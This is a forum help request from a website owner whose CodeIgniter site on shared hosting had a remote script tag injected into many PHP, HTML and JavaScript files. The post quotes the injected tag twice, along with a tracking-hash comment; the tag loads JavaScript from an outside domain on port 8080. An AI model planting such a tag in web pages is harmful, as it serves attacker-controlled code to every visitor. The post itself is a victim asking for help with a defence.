script tag inserted
Posted: Fri Jul 09, 2010 4:40 am
hi to all
I am using codeigniter framework for my website and hosted on shared hosting server. Most of my index.php, home.php, index.html and other .js, at the end of the file there was inserted script like below, it was using different value on src="" . Is this the Cross-site scripting? How they inject to my file? I used 755 as file permission. How to prevent this because I've encounterd this twice. Even I replaced all files it will attack again. Additionally, not only one domain is being attack almost all hosted on that server.
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
I am using codeigniter framework for my website and hosted on shared hosting server. Most of my index.php, home.php, index.html and other .js, at the end of the file there was inserted script like below, it was using different value on src="" . Is this the Cross-site scripting? How they inject to my file? I used 755 as file permission. How to prevent this because I've encounterd this twice. Even I replaced all files it will attack again. Additionally, not only one domain is being attack almost all hosted on that server.
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->